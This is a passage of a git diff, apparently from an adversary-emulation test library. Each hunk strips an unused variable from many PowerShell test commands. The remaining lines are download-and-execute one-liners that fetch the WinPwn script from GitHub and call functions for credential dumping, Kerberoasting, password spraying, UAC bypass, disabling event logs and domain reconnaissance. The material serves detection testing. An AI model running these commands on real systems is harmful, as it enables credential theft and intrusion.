net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') domainpassspray -consoleoutput -noninteractive -emptypasswords name: powershell @@ -79111,7 +79090,6 @@ credential-access: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') sensitivefiles -noninteractive -consoleoutput name: powershell @@ -79123,7 +79101,6 @@ credential-access: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') Snaffler -noninteractive -consoleoutput name: powershell @@ -79135,7 +79112,6 @@ credential-access: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') powershellsensitive -consoleoutput -noninteractive name: powershell @@ -79146,7 +79122,6 @@ credential-access: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') passhunt -local $true -noninteractive cleanup_command: |- @@ -79165,7 +79140,6 @@ credential-access: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') sessionGopher -noninteractive -consoleoutput name: powershell @@ -79177,8 +79151,7 @@ credential-access: supported_platforms: - windows executor: - command: "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object - net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nSharpCloud + command: "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nSharpCloud -consoleoutput -noninteractive " name: powershell - name: List Credential Files via PowerShell @@ -81852,7 +81825,6 @@ credential-access: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') Kerberoasting -consoleoutput -noninteractive name: powershell @@ -82991,7 +82963,6 @@ discovery: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') GPOAudit -noninteractive -consoleoutput name: powershell @@ -83003,7 +82974,6 @@ discovery: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') GPORemoteAccessPolicy -consoleoutput -noninteractive name: powershell @@ -83520,7 +83490,6 @@ discovery: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') generaldomaininfo -noninteractive -consoleoutput name: powershell @@ -84770,7 +84739,6 @@ discovery: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') shareenumeration -noninteractive -consoleoutput name: powershell @@ -84929,7 +84897,6 @@ discovery: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') printercheck -noninteractive -consoleoutput name: powershell @@ -85126,7 +85093,6 @@ discovery: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') winPEAS -noninteractive -consoleoutput name: powershell @@ -85138,7 +85104,6 @@ discovery: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') itm4nprivesc -noninteractive -consoleoutput name: powershell @@ -85149,7 +85114,6 @@ discovery: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') oldchecks -noninteractive -consoleoutput cleanup_command: |- @@ -85166,7 +85130,6 @@ discovery: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') otherchecks -noninteractive -consoleoutput name: powershell @@ -85178,7 +85141,6 @@ discovery: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') Generalrecon -consoleoutput -noninteractive name: powershell @@ -85190,7 +85152,6 @@ discovery: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') Morerecon -noninteractive -consoleoutput name: powershell @@ -85202,7 +85163,6 @@ discovery: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') RBCD-Check -consoleoutput -noninteractive name: powershell @@ -89184,7 +89144,6 @@ discovery: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') spoolvulnscan -noninteractive -consoleoutput name: powershell @@ -89196,7 +89155,6 @@ discovery: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') MS17-10 -noninteractive -consoleoutput name: powershell @@ -89209,7 +89167,6 @@ discovery: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') bluekeep -noninteractive -consoleoutput name: powershell @@ -89221,7 +89178,6 @@ discovery: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') fruit -noninteractive -consoleoutput name: powershell @@ -89371,7 +89327,6 @@ discovery: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') Dotnetsearch -noninteractive -consoleoutput name: powershell @@ -89383,7 +89338,6 @@ discovery: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') dotnet -consoleoutput -noninteractive name: powershell @@ -89394,7 +89348,6 @@ discovery: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') powerSQL -noninteractive -consoleoutput name: powershell @@ -100007,7 +99960,6 @@ initial-access: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') obfuskittiedump -consoleoutput -noninteractive name: powershell @@ -100019,7 +99971,6 @@ initial-access: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') safedump -consoleoutput -noninteractive name: powershell diff --git a/atomics/T1003.002/T1003.002.md b/atomics/T1003.002/T1003.002.md index 98944064..5af7f980 100644 --- a/atomics/T1003.002/T1003.002.md +++ b/atomics/T1003.002/T1003.002.md @@ -332,7 +332,6 @@ Loot local Credentials - Dump SAM-File for NTLM Hashes technique via function of ```powershell -$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') samfile -consoleoutput -noninteractive ``` diff --git a/atomics/T1046/T1046.md b/atomics/T1046/T1046.md index e88b2ebd..c00b705e 100644 --- a/atomics/T1046/T1046.md +++ b/atomics/T1046/T1046.md @@ -249,7 +249,6 @@ Start MS-RPRN RPC Service Scan using spoolvulnscan function of WinPwn ```powershell -$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') spoolvulnscan -noninteractive -consoleoutput ``` @@ -279,7 +278,6 @@ Search for MS17-10 vulnerable Windows Servers in the domain using powerSQL funct ```powershell -$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') MS17-10 -noninteractive -consoleoutput ``` @@ -309,7 +307,6 @@ Search for bluekeep vulnerable Windows Systems in the domain using bluekeep func ```powershell -$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') bluekeep -noninteractive -consoleoutput ``` @@ -339,7 +336,6 @@ Search for potentially vulnerable web apps (low hanging fruits) using fruit func ```powershell -$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') fruit -noninteractive -consoleoutput ``` diff --git a/atomics/T1078.003/T1078.003.md b/atomics/T1078.003/T1078.003.md index 89fc579a..72976682 100644 --- a/atomics/T1078.003/T1078.003.md +++ b/atomics/T1078.003/T1078.003.md @@ -229,7 +229,6 @@ Loot local Credentials - powerhell kittie technique via function of WinPwn ```powershell -$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') obfuskittiedump -consoleoutput -noninteractive ``` @@ -259,7 +258,6 @@ Loot local Credentials - Safetykatz technique via function of WinPwn ```powershell -$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') safedump -consoleoutput -noninteractive ``` diff --git a/atomics/T1082/T1082.md b/atomics/T1082/T1082.md index 5382f00e..1e665cdc 100644 --- a/atomics/T1082/T1082.md +++ b/atomics/T1082/T1082.md @@ -521,7 +521,6 @@ Discover Local Privilege Escalation possibilities using winPEAS function of WinP ```powershell -$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') winPEAS -noninteractive -consoleoutput ``` @@ -551,7 +550,6 @@ Discover Local Privilege Escalation possibilities using itm4nprivesc function of ```powershell -$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') itm4nprivesc -noninteractive -consoleoutput ``` @@ -581,7 +579,6 @@ Powersploits privesc checks using oldchecks function of WinPwn ```powershell -$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') oldchecks -noninteractive -consoleoutput ``` @@ -619,7 +616,6 @@ General privesc checks using the otherchecks function of WinPwn ```powershell -$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') otherchecks -noninteractive -consoleoutput ``` @@ -649,7 +645,6 @@ Collect general computer informations via GeneralRecon function of WinPwn ```powershell -$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') Generalrecon -consoleoutput -noninteractive ``` @@ -679,7 +674,6 @@ Gathers local system information using the Morerecon function of WinPwn ```powershell -$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') Morerecon -noninteractive -consoleoutput ``` @@ -709,7 +703,6 @@ Search for Resource-Based Constrained Delegation attack paths using RBCD-Check f ```powershell -$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') RBCD-Check -consoleoutput -noninteractive ``` diff --git a/atomics/T1087.002/T1087.002.md b/atomics/T1087.002/T1087.002.md index 574c0a64..bcd0a27e 100644 --- a/atomics/T1087.002/T1087.002.md +++ b/atomics/T1087.002/T1087.002.md @@ -612,7 +612,6 @@ Gathers general domain information using the generaldomaininfo function of WinPw ```powershell -$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') generaldomaininfo -noninteractive -consoleoutput ``` diff --git a/atomics/T1110.003/T1110.003.md b/atomics/T1110.003/T1110.003.md index 80bd5cb2..7edc010d 100644 --- a/atomics/T1110.003/T1110.003.md +++ b/atomics/T1110.003/T1110.003.md @@ -277,7 +277,6 @@ DomainPasswordSpray Attacks technique via function of WinPwn ```powershell -$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') domainpassspray -consoleoutput -noninteractive -emptypasswords ``` diff --git a/atomics/T1120/T1120.md b/atomics/T1120/T1120.md index f428a59c..2b7d094f 100644 --- a/atomics/T1120/T1120.md +++ b/atomics/T1120/T1120.md @@ -66,7 +66,6 @@ Search for printers / potential vulns using printercheck function of WinPwn ```powershell -$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') printercheck -noninteractive -consoleoutput ``` diff --git a/atomics/T1135/T1135.md b/atomics/T1135/T1135.md index a533b010..a1ede665 100644 --- a/atomics/T1135/T1135.md +++ b/atomics/T1135/T1135.md @@ -356,7 +356,6 @@ Network share enumeration using the shareenumeration function of WinPwn ```powershell -$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') shareenumeration -noninteractive -consoleoutput ``` diff --git a/atomics/T1518/T1518.md b/atomics/T1518/T1518.md index a6806fc7..4d20a9fb 100644 --- a/atomics/T1518/T1518.md +++ b/atomics/T1518/T1518.md @@ -128,7 +128,6 @@ Search for any .NET binary file in a share using the Dotnetsearch function of Wi ```powershell -$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') Dotnetsearch -noninteractive -consoleoutput ``` @@ -158,7 +157,6 @@ Search for .NET Service-Binaries on this system via winpwn dotnet function of Wi ```powershell -$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') dotnet -consoleoutput -noninteractive ``` @@ -188,7 +186,6 @@ Start PowerUpSQL Checks using powerSQL function of WinPwn ```powershell -$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') powerSQL -noninteractive -consoleoutput ``` diff --git a/atomics/T1548.002/T1548.002.md b/atomics/T1548.002/T1548.002.md index 2c23af3f..fade1a79 100644 --- a/atomics/T1548.002/T1548.002.md +++ b/atomics/T1548.002/T1548.002.md @@ -1016,7 +1016,6 @@ UAC bypass using Magic technique via function of WinPwn ```powershell -$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') UACBypass -noninteractive -command "C:\windows\system32\cmd.exe" -technique magic ``` @@ -1046,7 +1045,6 @@ UAC bypass using ccmstp technique via function of WinPwn ```powershell -$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') UACBypass -noninteractive -command "C:\windows\system32\calc.exe" -technique ccmstp ``` @@ -1076,7 +1074,6 @@ UAC bypass using DiskCleanup technique via function of WinPwn ```powershell -$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') UACBypass -noninteractive -command "C:\windows\system32\cmd.exe" -technique DiskCleanup ``` diff --git a/atomics/T1552.001/T1552.001.md b/atomics/T1552.001/T1552.001.md index 2ba3937e..416eb7f3 100644 --- a/atomics/T1552.001/T1552.001.md +++ b/atomics/T1552.001/T1552.001.md @@ -249,7 +249,6 @@ Search for sensitive files on this local system using the SensitiveFiles functio ```powershell -$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') sensitivefiles -noninteractive -consoleoutput ``` @@ -279,7 +278,6 @@ Check Domain Network-Shares for cleartext passwords using Snaffler function of W ```powershell -$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') Snaffler -noninteractive -consoleoutput ``` @@ -309,7 +307,6 @@ Check Powershell event logs for credentials or other sensitive information via w ```powershell -$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') powershellsensitive -consoleoutput -noninteractive ``` @@ -339,7 +336,6 @@ Search for Passwords on this system using passhunt via WinPwn ```powershell -$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') passhunt -local $true -noninteractive ``` @@ -379,7 +375,6 @@ Launches SessionGopher on this system via WinPwn ```powershell -$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') sessionGopher -noninteractive -consoleoutput ``` @@ -409,7 +404,6 @@ Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials te ```powershell -$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') SharpCloud -consoleoutput -noninteractive ``` diff --git a/atomics/T1555.003/T1555.003.md b/atomics/T1555.003/T1555.003.md index f7d30e0e..53faff9e 100644 --- a/atomics/T1555.003/T1555.003.md +++ b/atomics/T1555.003/T1555.003.md @@ -661,7 +661,6 @@ Collect Browser credentials as well as the history via winpwn browserpwn functio ```powershell -$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') browserpwn -consoleoutput -noninteractive ``` @@ -695,7 +694,6 @@ Loot local Credentials - mimi-kittenz technique via function of WinPwn - Extend ```powershell -$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') kittenz -consoleoutput -noninteractive ``` diff --git a/atomics/T1555/T1555.md b/atomics/T1555/T1555.md index aac92ec6..4bf0f1e8 100644 --- a/atomics/T1555/T1555.md +++ b/atomics/T1555/T1555.md @@ -206,7 +206,6 @@ This tool has been developed for the purpose of finding these passwords for the ```powershell -$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') lazagnemodule -consoleoutput -noninteractive ``` @@ -236,7 +235,6 @@ Loot local Credentials - Wifi Credentials technique via function of WinPwn ```powershell -$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') wificreds -consoleoutput -noninteractive ``` @@ -266,7 +264,6 @@ Loot local Credentials - Decrypt Teamviewer Passwords technique via function of ```powershell -$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') decryptteamviewer -consoleoutput -noninteractive ``` diff --git a/atomics/T1558.003/T1558.003.md b/atomics/T1558.003/T1558.003.md index 6a9c4339..549b9907 100644 --- a/atomics/T1558.003/T1558.003.md +++ b/atomics/T1558.003/T1558.003.md @@ -294,7 +294,6 @@ Kerberoasting technique via function of WinPwn ```powershell -$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') Kerberoasting -consoleoutput -noninteractive ``` diff --git a/atomics/T1562.001/T1562.001.md b/atomics/T1562.001/T1562.001.md index fe853ab8..cf722c57 100644 --- a/atomics/T1562.001/T1562.001.md +++ b/atomics/T1562.001/T1562.001.md @@ -1347,7 +1347,6 @@ Kill the event log services for stealth via function of WinPwn ```powershell -$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') inv-phantom -consoleoutput -noninteractive ``` diff --git a/atomics/T1615/T1615.md b/atomics/T1615/T1615.md index ce825de8..0a41a212 100644 --- a/atomics/T1615/T1615.md +++ b/atomics/T1615/T1615.md @@ -96,7 +96,6 @@ Check domain Group policies for common misconfigurations using Grouper2 via GPOA ```powershell -$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') GPOAudit -noninteractive -consoleoutput ``` @@ -126,7 +125,6 @@ Enumerate remote access policies through group policy using GPORemoteAccessPolic ```powershell -$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object 